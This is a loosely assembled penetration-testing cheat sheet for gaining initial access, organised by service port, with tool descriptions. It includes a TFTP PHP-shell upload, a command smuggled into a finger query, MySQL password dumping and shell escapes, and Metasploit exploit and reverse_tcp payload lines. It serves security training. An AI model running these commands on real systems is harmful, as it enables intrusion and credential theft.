After finding your target and enumerating it, its now time for your initial access. This step is usually focused around exploiting a port/service open to you. There are tons of different ways to do this as you can see with the guides and list below.
Keep in mind that just because you cannot completely exploit one service does not mean it wont be helpful. Certain services may have interesting intel that might help you exploit something else, such as an open FTP server with anonymous auth, that contains a few docs with valid usernames in it (you will find worse things).
Once you have your initial exploitation, you will essentially attempt a second round of it to escalate your privileges in the target box. Some times that can be done by getting initial access on another trusted box, or even by a service that is running internally on the loopback. Check everything, look everywhere, and dont forget the OSCP catch phrase, "try harder!"
Perl script which scans cisco routers for common vulnerabilities.
# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst
25 - SMTP
HELO -
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
telnet $ip 25
EHLO root
MAIL FROM:root@target.com
RCPT TO:example@gmail.com
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT
swaks (Swiss Army Knife SMTP) is a command-line tool written in Perl for testing SMTP setups; it supports STARTTLS and SMTP AUTH (PLAIN, LOGIN, CRAM-MD5, SPA, and DIGEST-MD5). swaks allows one to stop the SMTP dialog at any stage, e.g to check RCPT TO: without actually sending a mail.
47/1723 - PPTP
Point-to-Point Tunneling Protocol provides remote access to mobile devices, uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers.
DNS Cache Snooping - You can use the simple 'dig' command to explore what is saved in the target DNS Cache. Make sure you make these requests non-recursively so you do not contaminate the current cache.
Hacking: The next generation - DNS Cache Snooping, pg. 86
#dig @targeterver.example.com testdomain.com A +norecurse
69 - TFTP
tftp [target] PUT local_file
tftp [target] GET example.txt
If unauthenticated access is allowed with write permissions, you can upload a shell:
$ tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
79 - Finger
#finger username@domain.com
$ finger-user-enum.pl -U users.txt -t $ip
#finger “/bin/ls -a /@domain.com”
80/443 - Web
Open a connection
$ openssl s_client -connect $ip:443
Basic SSL ciphers check
$ nmap --script ssl-enum-ciphers -p 443 $ip
Look for unsafe ciphers such as Triple-DES and Blowfish
Very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc...
ident-user-enum - A simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system.
# Endpoint Mapper Service Discovery
use auxiliary/scanner/dcerpc/endpoint_mapper
#Hidden DCERPC Service Discovery
use auxiliary/scanner/dcerpc/hidden
# Remote Management Interface Discovery
use auxiliary/scanner/dcerpc/management
# DCERPC TCP Service Auditor
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
msf > use exploit/windows/dcerpc/ms03_026_dcom
SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host, or both!?
smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.
atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
smbclient.py: A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It's an excellent example to see how to use impacket.smb in action.
addcomputer.py: Allows to add a computer to a domain using LDAP or SAMR (SMB).
getArch.py: This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.
ifmap.py: This script will bind to the target's MGMT interface to get a list of interface IDs. It will used that list on top of another list of interface UUIDs seen in the wild trying to bind to each interface and reports whether the interface is listed and/or listening.
lookupsid.py: A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them looping over the hosts found and keeping track of who logged in/out from remote servers
opdump.py: This binds to the given hostname:port and MSRPC interface. Then, it tries to call each of the first 256 operation numbers in turn and reports the outcome of each call.
reg.py: Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility.
rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
samrdump.py: An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
services.py: This script can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change.
Metasploit
Version
msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run
MultiExploit
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
Brute force community string check, find SNMP services.
onesixtyone - onesixtyone is a simple SNMP scanner which sends SNMP requests for the sysDescr value asynchronously with user-adjustable sending times and then logs the responses which gives the description of the software running on the device.
LDAPmonitor - Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration
ldapdomaindump - Active Directory information dumper via LDAP
HEKATOMB - Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them.
oracsec - A simple utility that can be used to enumerate SID's and carry out a simple username and password check against all default known usernames and passwords.
Oscanner - an Oracle assessment framework developed in Java.
This package contains the ODAT (Oracle Database Attacking Tool), an open source penetration testing tool that tests the security of Oracle Databases remotely.
thc-pptp-bruter - Brute force program against pptp vpn endpoints (tcp port 1723). Fully standalone. Supports latest MSChapV2 authentication. Tested against Windows and Cisco gateways. Exploits a weakness in Microsoft’s anti-brute force implementation which makes it possible to try 300 passwords the second.
1900 - SSDP (UDP)
evil-ssdp - This tool responds to SSDP multicast discover requests, posing as a generic UPNP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network.
mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Access passwords
mysql> use mysql
mysql> select user,password from user;
mysql>select user();
mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
mysql> \! cat /etc/passwd
mysql> \! bash
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
sqlsus is an open source MySQL injection and takeover tool, written in perl. Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database(s), and much more… Whenever relevant, sqlsus will mimic a MySQL console output.
SipVicious - SIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password.